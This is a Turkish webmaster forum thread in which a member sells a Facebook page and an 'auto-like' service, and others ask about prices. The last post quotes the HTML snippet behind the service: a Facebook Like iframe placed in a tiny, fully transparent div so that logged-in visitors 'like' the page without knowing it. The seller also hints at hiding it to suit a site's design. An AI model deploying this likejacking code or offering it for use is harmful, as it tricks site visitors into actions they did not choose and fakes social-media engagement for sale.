İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

1 Günlük Sayfa +9 K Ve Satılıktır & Sitelerinize OtoLike Yapılır

q72

0
Yasakli Uye
Reaction score
15
sayfa 1 günLük : ) sayfayı kasacaz vakit kaybetmeyelim diye resme bile ellemedik : ) paylaşım falan hiç yok

Yeniçeri

Ne Mutlu Türküm Diyene
İyinet Üyesi
Reaction score
306
İçerisinde hiç paylaşım olmadığı için beğeni sayısınıda göremiyoruz ki bu sayfa alımı için çok önemlidir. Yani şahsen ben bu sayfaya 10$ vereceğime, 1k olan ama beğeni sayısı ortalama 50-60 olan bi sayfa 10$ vermeyi tercih ederim. En azından bikaç paylaşım yapmanı tavsiye ederim. Bu şekilde daha yüksek teklif alabilirsin.

q72

0
Yasakli Uye
Reaction score
15
İçerisinde hiç paylaşım olmadığı için beğeni sayısınıda göremiyoruz ki bu sayfa alımı için çok önemlidir. Yani şahsen ben bu sayfaya 10$ vereceğime, 1k olan ama beğeni sayısı ortalama 50-60 olan bi sayfa 10$ vermeyi tercih ederim. En azından bikaç paylaşım yapmanı tavsiye ederim. Bu şekilde daha yüksek teklif alabilirsin.

Doğru Diyosun Oda Olur birazdan :)

Yeniçeri

Ne Mutlu Türküm Diyene
İyinet Üyesi
Reaction score
306
Bu arada otolike ücretleri nedir? Mesela 4k üyeyi kaça çekersin?

q72

0
Yasakli Uye
Reaction score
15
Google'yi kuLlanabilirsiniz. ama site tasarımınna göre saklamak iş orda saten : )

edademir

0
İyinet Üyesi
Reaction score
0
sayfama otolike yaptırmak istiyorum

merhaba sayfama otolike yaptırmak istiyorum 10k otolike için maximum 30 tl fiyat verdiler eğer bu fiyata yaparsanız yaptırmak istiyorum ....

edademir

0
İyinet Üyesi
Reaction score
0
otolike

sayfama otolike yaptırmak istiyorum 10k otolike ne kadar yaparssın yada yapıcak kim var acaba ????

ByLacoste

1
İyinet Üyesi
Reaction score
70
Şimdi siz devamını oku'ya bu kodu eklediniz.
</script></head><div id='icontainer' style='overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;'>
<iframe allowTransparency='true' frameborder='0' scrolling='no' src='http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/qSaGoPaKaJmeR&layout=standard&show_faces=true&width=450&action=like&colorscheme=light&height=80' style='border:none; overflow:hidden; width:450px; height:80px;'></iframe>
</div>
<script>
Siteye girip fb üyeliği açık olan herkes beğenmiş mi oluyor. Olay bu mu?

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5